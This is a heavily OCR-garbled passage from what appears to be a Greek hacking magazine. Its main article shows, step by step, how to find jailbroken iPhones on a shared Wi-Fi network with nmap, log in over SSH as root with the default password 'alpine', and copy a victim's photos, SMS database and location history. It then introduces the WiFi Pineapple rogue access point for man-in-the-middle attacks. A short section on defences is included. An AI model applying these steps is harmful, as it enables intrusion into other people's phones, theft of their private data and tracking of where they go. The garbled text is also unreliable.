Apple, Inc. grep, Kernel Extension Tools, 
192.168.1.8 Ἡ i 

= MobileTerminal, Nano, Nmap, 

drg-iPad > OpenSSH, system-cmds, wget 

192.168.1.9 και network-cmds (>.T.E. Εντάξει. 

192.168.1.10 Πάνω να σπάσω και то δικὀ µου 

a E ραπ > iPhone.) Мерка an’ αυτά ενδέχεται 

уа εἶναι ἠδη εγκατεστημένα, ὅπως 

το MobileTerminal, το OpenSSH ка! 

το system-cmds. Με την ευκαιρἱα, 

καλὸ θα ἦταν να αναφέρουμε και 

μερικὰ εναλλακτικά προγράμματα, 

τα οποία μάλιστα εἶναι εγκεκριµέ- 

Асар ЕН С © va апо την Apple! Ауафербиаоте 


ota iNet, iSSH ка! iStorage. То 

прото (iNet) περιέχει тіс napakd- 
τω χρήσιμες δυνατότητες: Network Scanning, Ping, Bonjour Browser, 
Port scanning к.а. To δεύτερο (155Н) στηρἰζεται στο γνωστὸ PUTTY των 
Windows και προσφέρει Eva terminal, το οποίο υποστηρίζει συνδέσεις 
SSH, rlogin και telnet. Με το iStorage μπορούμε να έχουμε πρὀσβαση σε 
ἄλλους υπολογιστές (PC ñ Mac), σε ἄλλα iPhone, σε websites, σε FTP και 
SFTP servers κ.λπ. 


Εντοπισμὀς στόχου 


Ὅπως αντιλαμβάνεστε, η επἰθεσἠή µας θα πραγµατοποιηθεἰ στο πλαίσιο 
ενὸς ασύρματου τοπικού δικτύου. Όταν βρεθούμε λοιπὀν σε κάποιο, 
μπορούμε ν΄ αρχίσουμε την αναζήτηση υποψήφιων θυμάτων. Αρχικἁ θα 
ἠταν χρήσιμο να σημειώσουμε τη διεύθυνση ІР της συσκευής µας και 
του router. Στη δικἡ µας περίπτωση, то smartphone εἰχε τη διεύθυνση 
192.168.1.8 κι о router την 192.168.1.1. 


Тора, δεν έχουμε пара уа τρέξουμε το terminal που εγκαταστήσαμε και 
να αποκτήσουμε πρόσβαση root, χρησιμοποιώντας το default password 
που εἶναι «alpine» (χωρὶς τα εισαγωγικἁ): 


drg-iphone:- mobile$ 
drg-iphone:- mobile$ su - 
Password: 

drg-iphone:- root# 


Πλέον, ос root μπορούμε να χρησιμοποιήσουμε то птар για να βρούμε 
τους χρήστες (hosts) του τοπικού δικτύου στο οποίο βρισκόμαστε. Та 
αποτελέσµατα αυτής της σἀρωσης/ανίχνευσης θα ἦταν πρακτικὀ να τα 
αποθηκεύσουµε σε Eva αρχείο text (π.χ., στο output.txt): 


drg-iphone:- root# птар 192.168.1.1/24 > output.txt 
Εναλλακτικά, μπορούμε уа χρησιμοποιήσουμε το απλούστερο στη xph- 
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ση iNet, опос Φαίνεται στις εικόνες 
1 και 2. Πάντως για όσους επιµέ- 
νουν στο nmap, να σημειώσουμε 
ὁτι εξαιτίας ενὸς παράξενου bug 
η εκτἑἐλεσή του σε iPhone ἐχει 
σαν αποτέλεσμα το κόλλημα του 
terminal. Π’ αυτό, λίγο μετὰ θα 
πρέπει να πατήσουμε το KEVTPIKO 
κουμπί της συσκευἠς µια φορὰ και 
κατόπιν ἄλλες δύο, στα γρήγορα. 
Ἔτσι θα εμφανιστεὶ η μπάρα µε τις 
τρέχουσες εφαρμογές. Ano εκεἰ θα 
πρέπει να τερματἰίσουμε το terminal 
και στη συνέχεια να το ξεκινήσου- 
µε εκ νέου. Όπως προηγουμένως, 
πριν ano οτιδήποτε ἆλλο θα πρέπει 
να αποκτήσουμε και πάλι πρὀσβα- 
ση root. Αμέσως мета, μπορούμε 
να δούμε τα αποτελέσµατα της са- 
ρωσης του δικτύου. Па το σκοπὀ 
αυτό, арке! να δώσουμε το AKÒ- 
λουθο: 


μα. COSMOTE = 


12:41 my. 


Васк 


©, 192.168.1.9 


Scanning 192.168.1.9 


Ports to scan: 27 Timeout: 0.030 s 


22 The Secure Shell (SSH) Ргої І 


Scan finished... 
Open Ports: 1 (Scanned: 27) Time to scan: 1.05 s 


Εικόνα 2 

Το portscan του 
iNet εἶναι αποτε- 
λεσματικὀ, αν και 
πολλὲς φορὲς θα 
χρειαστεί να το 
εκτελέσετε τρεις 
φορές, ώστε уа 
πάρετε αξιόπιστα 
αποτελέσµατα. 
Εμείς πάντως θα 
συνιστούσαμε то 
παλιό-καλό nmap, 


που пара τα ὁποια 
κολλήματα στο iOS 


τελικά παραμέ- 
νει αξιόπιστο ка! 


πανίσχυρο. Τελικά, 


µε τα πολλά то 
portscan του iNet 
βρήκε өті το θύμα 
μας έχει ανοιχτό 
TO port 22. Eine 
κανείς 55Η; 


drg-iphone:- root# cat output.txt 

Τα περιεχόμενα του αρχείου θα μοιάζουν µε τα παρακάτω... 
Starting Nmap 5.00 ( http://nmap.org ) at 2012-02-02 00:35 EET 
Interesting ports on 192.168.1.8: 
Not shown: 998 closed ports 
PORT STATE SERVICE 
22/tcp 
62078/tcp open 


open ssh 

iphone-sync 
Interesting ports on 192.168.1.9: 
Not shown: 998 closed ports 


PORT STATE 
22/tcp 
62078/tcp open 

MAC Address: 78: 


open 


SERVICE 
ssh 
iphone-sync 


СА:39:СЕ:1А:97 (Unknown) 


Interesting ports on 192.168.1.1: 
Not shown: 997 closed ports 
PORT STATE SERVICE 


22/tcp open ssh 
53/tcp open domain 
80/tcp open 


MAC Address: 


http 
F4:EC:38:A0@:58:82 (Unknown) 


Nmap done: 256 IP addresses (3 hosts up) scanned in 65.66 
seconds. 


17 


Y HAGKER 


ÁN 


Στα αποτελέσµατα Tou nmap εντοπἰζουμε To smartphone µας, To access 
point του ασύρματου δικτύου και μία ακόµα συσκευἠ. Πρόκειται για τη 
συσκευἠ µε διεύθυνση 192.168.1.9. Bingo! Πέσαμε σε iPhone. Αναρωτιέ- 
στε пос то καταλάβαμε; Όπως βλέπετε, η συγκεκριμένη συσκευἠ χρη- 
σιμοποιεὶ ἑνα μυστήριο port, για µια υπηρεσία ονόματι iphone-sync. No- 
μίζουμε Оті εἶναι φως φανάρι пері τίνος πρὀκειται. Εκτὸς όμως ano αυτἠ 
τη χαρακτηριστικἠ υπηρεσία που δηλώνει την ταυτότητα της συσκευἠς, 
βλέπουμε και το γνωστό µας SSH, στο port 22. Τελικά, εἰμαστε πιο τυχε- 
poi an’ ògo νομἰζαμε αρχικά: Όχι µόνο πἐσαµε πάνω σε iPhone, алла εἶναι 
και σπασμένο! Μήπως το υποψήφιο θύμα ἐχει αφἠσει το προεπιλεγμένο 
password για τον χρήστη root; Με άλλα λόγια, μήπως ano αδιαφορἰα ἡ 
ano ἀγνοια ἐχει αφήσει το *default* password; Ας φορέσουμε то σατανι- 
KO µας χαμόγελο кі ας ελέγξουμε: 


drg-iphone:~ root# ssh -p 22 root@192.168.1.9 


The authenticity of host 192.168.1.9 (192.168.1.9)' can't be 
established. 


RSA key fingerprint is 3f:03:0f:01:5e:b7:f2:c5:f4:ea:8f:5e:4e:bf 
153149; 


Are you sure you want to continue connecting (yes/no)? yes 


Warning: Permanently added 192.168.1.9' (RSA) to the list of 
known hosts. 


root@192.168.1.9's password: 
drg:~ root# 


Όπως βλέπετε, τα καταφέραμε! Mnopei να µας ζητήθηκε то password, 
αλλά εμεὶς συνδεθἠκαµε χωρίς προβλήματα και пєрїпАока τρικ. Δώσαμε 


| A Е 4. - есе "νε r. | 
5 Бола» А NP але Δορυφόρος] Υβριδικός | 
> е м 


Istanbul 
ARTo 


Εικόνα 3 

Το θύμα µας κινεί- 
ται μεταξύ Αθήνας 
και Κρήτης. Δεν 
έχει ταξιδέψει και 
πολύ το παλικάρι 
μας. Τουλάχιστον 
ὀχι απὀ τότε που 
πῆρε To iPhone, 
εκτός αν ταξιδεύει 
χωρίς να το παίρνει 
най Tou. 


Ελλάς 
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μόνο To default password Tou root, το onoio ισχύει εξ ορισμού μετά апо 
To jailbreak. Πρόκειται για To password που ξέρει --ἡ τουλάχιστον кало 
θα ἦταν va &ёрғ-- ολόκληρος ο κόσμος: To alpine! Auth τη στιγμὴ, λοι- 
nov, δεν έχουμε αποκτήσει µόνο shell αλλά και root access! Ας δούμε TI 
μπορούμε να κάνουμε. 


Ουδέν κρυπτὀν UNO του root! 


Тора δεν µας σταματά τίποτα. Με τα δικαιώματα του root δεν υπάρ- 
χει кат! κρυφὀ апо τα μάτια µας. Μπορούμε να δούμε τις єпафёс του 
χρήστη, τα email, τα SMS, τις φωτογραφίες, τα cookies, τα notes, τα 
downloads -- ακόµα και που ἐχει βρεθεἰ, µε βάση τα στοιχεία του GPS! 
Па παράδειγµα, αν θέλουμε уа κατεβάσουµε τις φωτογραφίες που ἐχει 
τραβήξει µε τη μηχανὴ της συσκευής, μπορούμε να δώσουμε каті τέτοιο: 


drg-iphone:~ root# scp root@192.168.1.9:/User/Media/ 
DCIM/1@@APPLE/* ~/ 


Κατ’ αυτὸν τον τρὀπο θα αντιγράψουμε ολόκληρο τον φάκελο /User/ 
Media/DCIM/100APPLE στο home directory της бікйс µας συσκευής. Ау 
πάλι θέλαμε уа κατεβάσουμε το αρχείο DB µε та SMS του χρήστη, θα 
αρκούσε кат! TETOIO: 


drg-iphone:~ root# scp root@192.168.1.9:/User/Library/SMS/sms. 


db ~/ 
LE] «PONT Le ας Εικόνα 4 
Χάρτης |Δορυφόρος] Υβριδικός Πολύ Ζωγράφου 
РЕ ты Шы; και κέντρο παίζει 
/ == C > το θύμα µας. Вё- 


βαια, πετάγεται και 
προς Καλλιθέα συ- 
Хуа-пикуа, όπως 
και στο Αιγάλεω 
και στο МікроЛіра- 
νο! Γενικά, ησυχία 
δεν EXE! ;) 
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Па у’ αποκτήσετε µια καλύτερη εικὀνα TOU τι μπορούμε vq αποσπάσουµε 
ano το θύμα, ρἰξτε µια ματιά στους πιο ενδιαφἑέροντες καταλόγους ενὸς 
iPad κι ενὸς iPhone. 


Πα το iPad: 
/User/Library/AddressBook 
/User/Library/Caches 
/User/Library/Cookies 
/User/Library/DataAccess 
/User/Library/Logs 
/User/Library/Mail 
/User/Library/Notes 
/User/Library/SMS 
/User/Media/DCIM/10@APPLE 
/User/Media/Downloads 

Па To iPhone: 
/private/var/root/Library/Caches/location 
/private/var/root/Library/AddressBook 
/private/var/root/Library/Cookies 
/User/Documents 
/User/Media/DCIM/10@APPLE 
/User/Library/SMS 
/User/Library/Mail 


Πέρα ano το να κατεβάσουµε αρχεία, μπορούμε Aveta και у’ ανεβάσου- 
με. Ἑνας праүнат!ка τρελὸς θα μπορούσε να ανεβάσει και να τρέξει £l- 
δικἠ εφαρµογή, η οποία υποκλέπτει live τις συνομιλίες! Ano την ἄλλη, 
ἑνας χαβαλετζἠς θα μπορούσε να ανεβάσει µια εικὀνα στο φάκελο /User/ 
Media/DCIM/100APPLE µε то μήνυμα: You've been hacked -- have а nice 
day ;) 


Ξέρω nou ñoouv χθες, προχθές, αντιπροχθὲἑς... 


Το consolidated.db εἶναι ἑνα αρχείο γύρω ano то οποίο ἐγινε σάλος και 
κινήθηκαν υποψίες σχετικἁ HE TO πόσο καταπατάται η λεγόμενη ιδιωτικὀ- 
тпта (privacy). H θέση του επίµαχου αρχείου εἶναι στη διαδρομή /private/ 
var/root/Library/Caches/location. >” αυτό το αρχείο αποθηκεύονται όλα 
τα γεωγραφικἁ δεδομένα σε συνάρτηση µε το χρόνο. Έτσι, µε βάση то 
περιεχόμενὀ του µπορεί κανεἰς να μάθει µε μεγάλη ακρίβεια το που ἐχει 
βρεθεί η συσκευἠ -- Kai то πὀτε! Πα την αποκωδικοποἱηση αυτού του ap- 
χείου και την αναπαράσταση των δεδομένων πάνω σε χάρτη, προσφἑρε- 
ται μάλιστα κι Eva εὐχρηστο εργαλεἰο. Αν τα πηγαίνετε кала µε τα Γαλλι- 
кй, µπορείτε να το βρείτε στο τέλος της ακὀλουθης σελἰδας: www.courbis. 
fr/spip.php?page=article&id_article=255. Apkei ν΄ ανεβάσουµε εκεἰ то 
αρχείο consolidated.db κι εντὸς ολίγων δευτερολέπτων θα πάρουμε Еуау 
χάρτη µε àa τα µέρη Onou ἐχει βρεθεί το θύμα. Δείτετις εικόνες З και 4. 
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Αντιμετώπιση 


Μια καλἠ πρακτικἠ εἶναι να τερµατίζουµε ὁλες τις εφαρμογὲς тіс οποίες 
δεν χρησιμοποιούμε. Βλέπετε, σε όλα Ta smartphone, πλέον, дтау περ- 
νάμε ano τη ша εφαρμογἠ στην ἄλλη η πρὠτη συνεχίζει να τρέχει στο 
background. Αυτό, θεωρητικἁ τουλάχιστον, ενδέχεται να µας βάλει σε 
μπελάδες. Σκεφτείτε για παράδειγµα бт! υπάρχουν νόμιμες εφαρμογές 
(ара μπαίνουν και σε *un* σπασμένα iPhone), οι οποίες μετατρέπουν τη 
συσκευἠ σε file server ἠ/και web server. Μερικές λανθασμένες ρυθμίσεις 
σε ша τέτοια εφαρμογἠ ενδέχεται ν΄ ανοΐξουν πολλὲς τρύπες στην асфа- 
λεια της συσκευής. Ποιος ο λόγος, λοιπὸν, у’ αφήνουμε ша τέτοια εφαρ- 
μογἠ ενεργἠ, εφόσον δεν τη χρειαζόμαστε; Επιπρόσθετα, кало θα Tav 
να προσέχουμε ιδιαίτερα τα sites που επισκεπτόµαστε, όταν Вріскора- 
στε σε ασύρματα δίκτυα που *õev* εμπιστευόμαστε. Πα παράδειγµα, δεν 
υπάρχει κανένας λόγος να συνδεθούμε στο λογαριασμὀ µας στο Paypal, 
ano το WiFi της πλατείας Συντάγματος! Επίσης, αν ка! αυτονόητο, va 
συμπληρώσουμε OT! εἶναι φρόνιμο να εφαρμόζουμε Ἐπάνταξ τα προτει- 
νόμενα firmware updates. 

Па το τέλος αφήσαμε το σημαντικότερο μέτρο, то опоіо ξεπερνά σε κρι- 
σιµότητα όλα та παραπάνω: Την αλλαγή του κωδικού για то λογαριασμὀ 
Tou root! Όταν κάνουμε jailbreak, εἶναι τουλάχιστον ανόητο να µαθαἰ- 
VOUHE бт! ο κωδικὸς του root εἶναι για όλους ο ἴδιος (alpine) και να µη 
φροντίζουμε να τον αλλάξουμε! Па να πετύχουμε κάτι τέτοιο, аркі ν΄ 
ανοἰξουµε Eva τερματικὀ, να μεταβούμε στο λογαριασμὀ του root κι and 
εκεἰ να τρἐξουµε το προγραμματάκι passwd: 


drg-iphone:- mobile$ su - 
Password: 

drg-iphone:- root# passwd 
Changing password for root. 
New password: 


Σημειώστε ὁτι θα ἦταν φρόνιμο να δώσετε ἑναν ιδιαίτερα ισχυρό κωδικὀ. 
Γενικά, EXE] παρατηρηθεἰ бт! οι κωδικοί ασφαλείας σε кіупта τηλέφωνα 
εἶναι πολὺ αδύναμοι. AUTO συμβαίνει γιατἰ οι χρήστες δυσκολεύονται уа 
γράψουν μεγάλους και περίπλοκους κωδικούς και καταφεύγουν σε μι- 
κροὺς και απλοϊκούς. Есіс θα πρέπει να αποφύγετε αυτή την παγίδα. 
Εξάλλου, µην ξεχνάτε бт! μιλάμε για то λογαριασμὀ του χρήστη root: Του 
χρήστη nou ἐχει απεριὀριστη δικαιοδοσἰα στη συσκευἠ µας! 
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O εξοπλισμός µας, 
λίγο πριν ξαμολη- 
θούμε για τις δο- 
κιμές! (1) Το Mark 
III εἰναι το μοντέλο 
του Pineapple 

που προλάβαμε 

να παραγγείλουμε 
λίγο πριν εξαντλη- 
θεί και αρχίσει η 
προετοιμασία TOU 
Mark IV. Το Mark 
III ουσιαστικά giv” 
ἑνας Alfa AP51 
802.11 b/g wireless 
router, που συν- 
δέεται σε υπολο- 
γιστή μέσω ша 
θύρας Ethernet. 
(2) Εξωτερικὀ 
πακέτο τεσσάρων 
μπαταριών AA, για 
την τροφοδοσία 
Tou Pineapple όταν 
δεν υπάρχει μπρίζα 
διαθέσιμη. (3) H 
κεραία 5dbi Tou 
Pineapple. (4) O 
μετασχηματιστής 
της συσκευής. 
Δέχεται τάση 100 
ἡ 240 volt και 
συνεπώς δουλεύει 
τόσο σε Αμερική 
όσο και Ευρώπη. 
Па να μπει στις 
δικές µας πρίζες, 
φυσικὰ, χρειάζεται 
аутаптора. (5) 
Φορητός υπολο- 
γιστής µε ueber 
sticker. A, έτρεχε 
και BackTrack :D 
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To Pineapple (ауауас) εἶναι ἑνας μικρὸς, χαριτωμένος wireless router 
τον οποίο οποιοσδήποτε µπορεί να προμηθευτεί апо το HakShop (http:// 
hakshop.myshopify.com), το ηλεκτρονικὀ κατάστημα της εκποµπἠς Hak5 
(http://hak5.org). H βασικἠ του λειτουργία εἶναι να προσφέρει ασύρμα- 
τη πρὀσβαση σε ασύρματες συσκευές, παριστάνοντας γνωστὰ γι’ αυτὲς 
Access Points. Έτσι, επιτρέπει στον κἀτοχὸ του να εξαπολύει επιθέσεις 
man іп the middle (ΜΙΤΜ) προς όσους χρησιμοποιούν Tov router. Праү- 
ματι, ακόµα και κάποιος που δεν πολυκαταλαβαίνει пос δουλεύουν τα 
ασύρματα δίκτυα ἠ/και δεν γνωρίζει πολλά ano penetration testing, εἶναι 
δυνατὀν ν΄ αρχίσει αμέσως να паіс µε To Pineapple -- ενδεχομένως και 
να onde! πλάκα µε τους wireless clients ἡ να опёру τον πανικὀ στην 
περιοχἠ. Βεβαίως, αν πρὀκειται περὶ κακὀβουλου ατόμου ως και uno- 
κλοπές ñ σοβαρὲς ζημιὲς µπορεί να προκαλεί, χωρὶς μάλιστα уа κοπιάζει 
ιδιαιτερα. 


Τη στιγμή που γράφεται то παρὀν κείμενο το Pineapple εἶναι εκτὸς stock 
και NPOXWPAVE οι προετοιμασίες για τη VEG ἐκδοσή του, τη Mark IV. Εμεὶς 
προλάβαμε να προμηθευτούμε Eva Mark III апо την προηγούμενη poup- 
ма, MOTE να то δοκιμάσουμε στην πράξη κι ¿TOI να δούµε aNd прото χέρι 
πόσο αποτελεσματικὀ/επικἰνδυνο εἶναι. Πριν ὁμως παρουσιάσουμε τη OU- 
σκευὴ και το software που τρέχει, δείξουμε пос συμπεριφἑρεται Eksi Ἔξω 
(TM) και δούµε τι μπορεἰ να πετύχει о κἀτοχός της, εἶναι σημαντικὀ va 
καταλάβουμε пос laptops, smartphones κι ἄλλες ασύρματες συσκευὲς 
αναζητούν wireless Access Points... 


Ασύρματα δίκτυα, σχεδὸν παντού 


Το πρὀτυπο IEEE 802.11 για τα ασύρματα δίκτυα περιγράφει δύο βασι- 
кес οντότητες: τον σταθμό (station, STA) και το σημεῖο πρὀσβασης 
(Access Point, ΑΡ). Παραδείγματα σταθμών αποτελούν та laptops, та 
smartphones, ог σταθεροἰ υπολογιστές, οι παιχνιδοκονσόλες κ.ο.κ. -- 


φορητός wireless router 
Қ 7 ХУ УУҮУҰҮҮУУХ УИУИЫ»ЯҡҚ6ҡА(»АЛАЛ%ШУУ  ИЯІЫЫҰЖЖХЖЖА 


αρκεἰ βέβαια va ενσωματώνουν κάρτες ασύρματης δικτύωσης και φυσικά 
το κατάλληλο λογισμικό (δηλαδἠ device drivers και λογισμικό διαχείρισης 
συνδέσεων). Κλασικὸ παράδειγμα σημείου πρὀσβασης εἶναι ο wireless 
router που EXOUHE στο опіті αλλά κι εκείνοι που υπάρχουν σε καφετέριες, 
σε εταιρείες καθώς και σε AVOIKTOUG χώρους ελεύθερης πρὀσβασης, ὁπως 
πλατείες, πολυκαταστήματα, πλοία, αεροδρὀµια κ.λπ. 


Тора, σύμφωνα µε το πρότυπο 802.11 Eva ασύρματο δίκτυο αναφέρεται 
ως Basic Service Set (BSS) και υπάρχουν δύο εἰδη τέτοιων δικτύων: Τα 
Independent Basic Service Set (ІВ55) και τα Extended Service Set 
(ESS). Ανεξαρτήτως Tou εἶδους, Eva ασύρματο δἰκτυο παἰρνει Eva дуо- 
на, то Àiyo-noÀÚ γνωστὀ σε όλους µας Service Set Identifier (SSID). 


Та біктуа 1855 ονομάζονται επίσης Ad-Hoc кі απαρτίζονται ano ἑνα 
οποιοδήποτε πλήθος σταθμών, χωρίς уа απαιτείται η nqpouoia κάποιου 
σημείου πρόσβασης. 


Та δε δίκτυα ESS ονομάζονται και Infrastructure Networks. Αυτά δη- 
μιουργούνται апо Eva ἡ περισσότερα σημεία πρὀσβασης που όλα μαζὶ ou- 
γκροτούν ἑνα σύστημα κατανομής (Distribution System, DS). Στο 
σπίτι ἡ στην καφετέρια έχουμε Infrastructure Networks αποτελούμενα 
ano ἑνα μόνο ΑΡ, συνήθως auTO που εἶναι ενσωματωμένο στον ADSL 
router (αλλά Ox! απαραίτητα). Σε μεγαλύτερους χώρους τα APs εἶναι πε- 
ρισσότερα απὀ Eva, ὥστε το σύστημα κατανομὴς να καλύπτει επαρκώς 
όλη την επιθυµητἠ περιοχἠ. 


H πλέον συνηθισμένη μορφὴ ασύρματου δικτύου εἶναι τα Infrastructure 
που αποτελούνται ano *ėva* μόνο Access Point. Πώς όμως συνδέονται Οι 
σταθμοί с’ αυτά τα σημεία πρὀσβασης; Αυτή εἶναι µια πολύ καλὴ ερώτηση 
και η απάντηση θα ἐρθει συνεχίζοντας το διάβασμα ;) 


Χαρούμενα frames, іптаута! τριγύρω 


Κάθε Access Point πρέπει µε κἀποιο τρὀπο να δηλώνει την παρουσία του, 
MOTE τα stations της περιοχἠς να ¿xouv µια ευκαιρία να συνδεθούν πάνω 
του. Ακριβώς γι’ аото τα APs εκπἐµπουν τα λεγόμενα beacon frames. 
Πρόκειται για πακέτα που περιλαμβάνουν, μεταξὺ ἄλλων, το SSID του 
ESS ὀπου аудкеі το ΑΡ, тіс υποστηριζόμενες ταχύτητες καθὼς και την 
πληροφορία για то αν η κρυπτογράφηση εἰναι ενεργοποιημένη ἡ ὀχι. 
Ἔτσι, Ta stations που xouv ενεργο- 


ποιημένο To WiFi εἶναι σε θέση να na- Wi-Fi: Looking for Networks... 


ρατηρούν beacon frames, επομένως слер 

να συνάγουν την ύπαρξη APs στην Turn Wi-Fi Off 
περιοχή κι ενδεχομένως уа συνδε- P 

Boùv σε κἀποιο εξ αυτών -- pe npo- ν' deltaWiFi 


ToBouAia του χρήστη τους. CYTA 

Ακόμα λοιπὀν κι ау πάμε µε To laptop CYTA3 

нас για *протп* фора σε μία кафете- internet 

pia που παρέχει WiFi, αφού To avoi- 

ξουµε θα δούμε то SSID του τοπικού Northern Outpost 

AP кі αν θέλουμε θα συνδεθούμε. 

Βεβαίως, στην περίπτωση που εἰναι Join Other Network... 
ενεργοποιημένη η κρυπτογράφηση Create Network... 

θα XPEIGOTOUHE το αντίστοιχο WEP ἡ 

WPA key, αλλά αυτό ката паса πιθα- Open Network Preferences... 


νότητα θα µας то δώσουν πρὀθυµα 


Εικόνα 1 
AUTO το μηχάνη- 
μα εἶχε κάποτε 
συνδεθεί σ΄ Eva 
ανοικτὀ ασύρματο 
δίκτυο µε ὀνομα 
<deltaWiFi> (βλ. 
deltaHacker 005, 
σελ. 22). Εἶχε 
περάσει καιρὸς 

απὀ την τελευταία 
фора, αυτὀ όμως 
δεν σημαίνει От! 

το μηχάνημα εἰχε 
ξεχάσει το δίκτυο. 
Και να, σήμερα το 
ξαναβρἠκε και συν- 
δέθηκε! Μόνο που 
στην праүратіко- 
τητα συσχετίστηκε 
и' éva Pineapple :5 


а 
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ano την καφετέρια. Υπάρχει και µια ἄλλη περίπτωση: Н κρυπτογράφηση 
уа µην εἶναι ενεργοποιημένη алла για να χρησιμοποιήσουμε то ασύρματο 
δίκτυο να πρέπει να κάνουμε login σε µια κατάλληλη «πρώτη» σελίδα 
του ESS (captive portal). Па ἄλλη µια φορά, τα στοιχεία για το σω- 
ото login gite θα µας τα δώσουν апо την καφετέρια εἰτε θα εἶναι πάνω 
στην απὀδειξη ano µια παραγγελία κ.ο.κ. Και µιας κι αναφερθήκαµε σε 
captive portals, να σημειώσουμε От! σε ορισμένα µέρη, όπως, N.X., σε 
πλατείες, προκειµένου να συνδεθούµε арке! να πληκτρολογήσουµε σω- 
ота κάποιο CAPTCHA (βλ. και http://de1ltahacker.gr/2008/10/02/captcha- 
introduction). Αλλά ας µην ξεφεύγουμε. 


Θα ἐχετε παρατηρήσει ὁτι та laptops, та tablets και та smartphones, 
θυμούνται τα ασύρματα δίκτυα στα οποἰα ¿xouv συνδεθεἰ ката το παρελ- 
Өду. Μάλιστα ὀποτε ξαναβρίσκουν κἀποιο εξ αυτών xouv µια τάση να 
συνδέονται αυτόματα, χωρίς να µας κουράζουν µε ερωτήσεις ἡ ζητώντας 
επιβεβαιώσεις. Ἔτσι, Отау ανοἰγετε το laptop σας στο σπίτι κι о wireless 
router εἶναι еуерүдс, η συσκευή θα συνδεθεί αυτόματα ακόµα κι αν εκεἰ 
γύρω υπάρχουν κι ἄλλα APs. Κάτι παρόμοιο συμβαίνει κι όταν πηγαίνετε 
στην εργασἰα ἡ στο εργαστήριο της σχολἠς, στο σπίτι ενὸς φίλου ἡ στην 
καφετέρια που εἶχατε πάει την προηγούμενη βδομάδα. Αναλυτικότερα, 
για λόγους ευκολίας τα stations στέλνουν τα λεγόμενα probe request 
frames. Πρόκειται για πακέτα που περιλαμβάνουν то SSID του ESS που 
αναζητούν, καθὠς και τις ταχύτητες σύνδεσης που υποστηρίζουν. Πρα- 
κτικἀ, Ta probe request frames εἶναι ο τρόπος που ἐχει Eva station για 
κάνει ερωτήσεις του στιλ: 


Exu, συγνώμη κιόλας που ενοχλώ, αλλά μήπως εδώ γύρω εἶναι το 
αγαπημένο µου σημείο πρόσβασης µε όνομα Parabing; Όχι; Χμ, μήπως 
τότε εἰναι то deltaWiFi; Ούτε κι αυτό;! Τι στο καλό... E, τότε 
σίγουρα θα είναι το NorthernHQ! Αμάν, ούτε; ! Τι στο καλό, πού 
βρίσκομαι, darn it?! 


Ὅμως τα stations μπορούν уа εκπέμπουν και frames µε κενό SSID, πραγ- 
ματοποιώντας τα λεγόμενα broadcast probe requests. Σ΄’ αυτές τις 
περιπτώσεις, εντελώς πανικόβλητα που δεν εἶναι online, εἶναι σαν ν΄ ava- 
ζητούν απεγνωσμένα Eva οποιοδήποτε ΑΡ για να συνδεθούν! 


Ano τη μεριά τους Ta Access Points συνήθως εἶναι σε θέση у’ ανταποκρἰ- 
νονται τόσο σε probe requests που περιλαμβάνουν то SSID τους, 000 και 
σε «σκέτα» broadcast probe requests, χωρίς κἄποιο SSID. Σε κάθε πε- 
pintwon, απαντούν μ’ ἑνα probe response frame που περιλαμβάνει το 
SSID του ESS (δηλαδή του ασύρματου δικτύου), τις υποστηριζόμενες TA- 
χύτητες καθώς και την πληροφορία пері χρήσης κρυπτογράφησης ἡ ὀχι. 
Προφανώς, αν το δίκτυο εἶναι κρυπτογραφημένο, τότε To station πριν 
ακόµα συνδεθεί ἡ αλλιώς συσχετιστεῖ µε το ΑΡ, πρέπει прота να περά- 
σει επιτυχώς ша διαδικασία πιστοποΐησης (authentication). Αυτή επι- 
τυγχάνεται µε την ανταλλαγἠ µιας σειρὰς authentication frames. Ау 
το station περάσει επιτυχὼς τη διαδικασία τότε στέλνει Eva association 
request frame, то ΑΡ апаута ы” ἑνα association response frame 
και πλέον το station εἶναι μέρος του ασύρματου δικτύου. Αν απὀ την 
ἄλλη το δίκτυο ЖбеуЖ% εἶναι κρυπτογραφημένο, τότε δεν υπάρχει καν 
διαδικασία authentication. >” αυτή την περίπτωση δεν ανταλλάσσονται 
authentication frames και το station στέλνει απευθείας Eva association 
request frame, στο οποίο то ΑΡ απαντά ы” Eva ευγενικὀτατο association 
response frame. Έτσι, To station γίνεται και πάλι Eva ευτυχισμένο μέλος 
του τοπικού, ασύρματου δικτύου! 
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Παρατηρήστε тора бт! ενώ το πρότυπο IEEE περιγράφει λεπτομερώς πὼς 
ἑνα station συσχετίζεται µε κἀποιο ΑΡ, η ἴδια η επιλογἠ του ΑΡ εἶναι εντε- 
λὼς χαλαρή. Μ΄ άλλα λόγια, δεν παρέχεται κανένας μηχανισμὸς που να 
δείχνει στο station дті το ESS µε ὀνομα PublicWiFi που πρωτοσυνάντησε 
στον πεζὀδρομο της Καλαμαριάς “деу” εἶναι το ἰδιο µε то ESS που επίσης 
ονομάζεται PublicWiFi και βρἰσκεται στην πλατεία Αριστοτέλους (τα πα- 
ραδεἰγµατα εἶναι εντελώς τυχαἰα :Ώ) Μ΄’ ἄλλα λόγια, το πρότυπο επιτρέπει 
την ὑπαρξη διαφορετικών ESS που xouv το ἴδιο буора και κανένα, pa 
κανένα GAAO χαρακτηριστικὀ που να τα διαφοροποιεί. (Οι διαφορετικὲς 
υποστηριζὀμενες ταχύτητες ἡ то κανάλι εκπομπἠς δεν μπορούν ν΄ αποτε- 


λοὺν ειδοποιἁ χαρακτηριστικά, µιας κι αυτά επιτρέπεται ν΄’ αλλάζουν ката Εικόνα 2 
το δοκούν.) Τέλος, το IEEE 802.11 δεν ασχολείται καν µε τη διαδικασία Ένα iPhone, 
επιλογής” μεταξύ των διαθέσιμων ESS. Αυτό, γιου γκόις, εἰπε µε σιγου- ἕνα tablet κι 


éva μηχάνημα 


pid о επικεφαλἠς της επιτροπἠἡς του 802.11 τη στιγμὴ που σηκωνόταν χωρίς hostname 
ano το τραπέζι κι ἑπιανε το σακάκι του, εἶναι δουλειά των χάρντγουερ απολαμβάνουν 
και σόφτγουερ βέντορς. Періттд να πούμε OT! όλοι συμφώνησαν μαζὶ δωρεάν Internet 
του, µερικοἰ μάλιστα τον ακολούθησαν για пота παραδίπλα, στου «Папа- ко шой Tou 
Н Inea е. 2Т0 
Τζόους Ντρινκς εντ Мор». peratu o ды 
Е 3 . I Ç XOG της συσκευής 

Ἕνας γευστικος ανανας που φερνει κακο карра βλέπει τα site που 
i , қ Я T επισκέπτονται о! 

To Pineapple εκμεταλλεύεται ακριβώς αυτή τη χαλαρότητα του προτύπου ανέμελοι χρήστες. 
IEEE 802.11 ως προς την ταυτοποίηση των ESS ἡ апла Access Points. O Ano τη στιγμή που 
